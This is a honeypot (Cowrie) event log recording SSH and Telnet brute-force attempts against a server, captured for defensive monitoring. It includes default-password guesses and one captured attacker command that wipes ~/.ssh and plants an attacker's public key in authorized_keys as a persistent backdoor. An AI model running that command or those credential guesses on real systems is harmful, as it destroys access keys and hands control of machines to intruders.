{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:47:54.869102Z","src_ip":"212.227.125.160","session":"5dac7bf81c2a"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:55.184097Z","src_ip":"212.227.125.160","session":"5dac7bf81c2a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:56.303124Z","src_ip":"212.227.125.160","session":"5dac7bf81c2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54276,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeb959a62603","protocol":"ssh","message":"New connection: 212.227.235.229:54276 (1.2.3.4:22) [session: aeb959a62603]","sensor":"my-vps","timestamp":"2025-08-28T05:48:02.065891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:48:02.067027Z","src_ip":"212.227.235.229","session":"aeb959a62603"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:48:02.211541Z","src_ip":"212.227.235.229","session":"aeb959a62603"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T05:48:02.653125Z","src_ip":"212.227.235.229","session":"aeb959a62603"}
{"eventid":"cowrie.session.closed","duration":33.600234031677246,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:03.257861Z","src_ip":"121.152.78.212","session":"1685a83ea513"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:03.798820Z","src_ip":"212.227.235.229","session":"aeb959a62603"}
{"eventid":"cowrie.session.closed","duration":31.41226363182068,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:05.054544Z","src_ip":"212.227.235.229","session":"86bb1cf77a62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43705,"dst_ip":"1.2.3.4","dst_port":23,"session":"41625a2e8417","protocol":"telnet","message":"New connection: 212.227.235.229:43705 (1.2.3.4:23) [session: 41625a2e8417]","sensor":"my-vps","timestamp":"2025-08-28T05:48:10.432921Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51378,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c1a1371758e","protocol":"ssh","message":"New connection: 212.227.235.229:51378 (1.2.3.4:22) [session: 1c1a1371758e]","sensor":"my-vps","timestamp":"2025-08-28T05:48:14.927328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:48:14.928157Z","src_ip":"212.227.235.229","session":"1c1a1371758e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:48:15.075592Z","src_ip":"212.227.235.229","session":"1c1a1371758e"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:48:15.510520Z","src_ip":"212.227.235.229","session":"1c1a1371758e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:16.655984Z","src_ip":"212.227.235.229","session":"1c1a1371758e"}
{"eventid":"cowrie.session.closed","duration":30.453407049179077,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:17.040960Z","src_ip":"212.227.125.160","session":"b2abe24f53d9"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":57782,"dst_ip":"1.2.3.4","dst_port":23,"session":"0944636812aa","protocol":"telnet","message":"New connection: 8.222.212.69:57782 (1.2.3.4:23) [session: 0944636812aa]","sensor":"my-vps","timestamp":"2025-08-28T05:48:17.824778Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43296,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6bbbebdbda4","protocol":"ssh","message":"New connection: 212.227.125.160:43296 (1.2.3.4:22) [session: e6bbbebdbda4]","sensor":"my-vps","timestamp":"2025-08-28T05:48:21.752233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:48:21.775812Z","src_ip":"212.227.125.160","session":"e6bbbebdbda4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:48:21.927691Z","src_ip":"212.227.125.160","session":"e6bbbebdbda4"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:48:22.458039Z","src_ip":"212.227.125.160","session":"e6bbbebdbda4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:48:22.708939Z","src_ip":"212.227.125.160","session":"e6bbbebdbda4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:48:22.709774Z","src_ip":"212.227.125.160","session":"e6bbbebdbda4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:22.816349Z","src_ip":"212.227.125.160","session":"e6bbbebdbda4"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:22.817314Z","src_ip":"212.227.125.160","session":"e6bbbebdbda4"}
{"eventid":"cowrie.session.closed","duration":33.66925358772278,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:22.958221Z","src_ip":"8.222.212.69","session":"75068eb82600"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55522,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c183a78816c","protocol":"ssh","message":"New connection: 212.227.125.160:55522 (1.2.3.4:22) [session: 8c183a78816c]","sensor":"my-vps","timestamp":"2025-08-28T05:48:39.437755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:48:39.441543Z","src_ip":"212.227.125.160","session":"8c183a78816c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:48:39.544212Z","src_ip":"212.227.125.160","session":"8c183a78816c"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-28T05:48:39.955529Z","src_ip":"212.227.125.160","session":"8c183a78816c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:41.062089Z","src_ip":"212.227.125.160","session":"8c183a78816c"}
{"eventid":"cowrie.session.closed","duration":31.41307830810547,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:41.845925Z","src_ip":"212.227.235.229","session":"41625a2e8417"}
{"eventid":"cowrie.session.connect","src_ip":"103.250.10.42","src_port":36890,"dst_ip":"1.2.3.4","dst_port":22,"session":"26ceaca2d6ce","protocol":"ssh","message":"New connection: 103.250.10.42:36890 (1.2.3.4:22) [session: 26ceaca2d6ce]","sensor":"my-vps","timestamp":"2025-08-28T05:48:43.926169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:48:43.926831Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:48:44.214991Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.login.success","username":"root","password":"2580","message":"login attempt [root/2580] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:48:45.420278Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:48:46.094440Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:48:46.095238Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T05:48:46.096114Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:46.389301Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55380,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6e989e6d7dc","protocol":"ssh","message":"New connection: 212.227.235.229:55380 (1.2.3.4:22) [session: c6e989e6d7dc]","sensor":"my-vps","timestamp":"2025-08-28T05:48:46.672000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:48:46.673148Z","src_ip":"212.227.235.229","session":"c6e989e6d7dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:48:46.816876Z","src_ip":"212.227.235.229","session":"c6e989e6d7dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:48:46.984719Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T05:48:46.985489Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.login.failed","username":"centos","password":"centos","message":"login attempt [centos/centos] failed","sensor":"my-vps","timestamp":"2025-08-28T05:48:47.269380Z","src_ip":"212.227.235.229","session":"c6e989e6d7dc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T05:48:47.280630Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:47.281724Z","src_ip":"103.250.10.42","session":"26ceaca2d6ce"}
{"eventid":"cowrie.session.connect","src_ip":"103.250.10.42","src_port":36906,"dst_ip":"1.2.3.4","dst_port":22,"session":"903684025771","protocol":"ssh","message":"New connection: 103.250.10.42:36906 (1.2.3.4:22) [session: 903684025771]","sensor":"my-vps","timestamp":"2025-08-28T05:48:47.571892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T05:48:47.572569Z","src_ip":"103.250.10.42","session":"903684025771"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T05:48:47.863341Z","src_ip":"103.250.10.42","session":"903684025771"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:48:48.414793Z","src_ip":"212.227.235.229","session":"c6e989e6d7dc"}
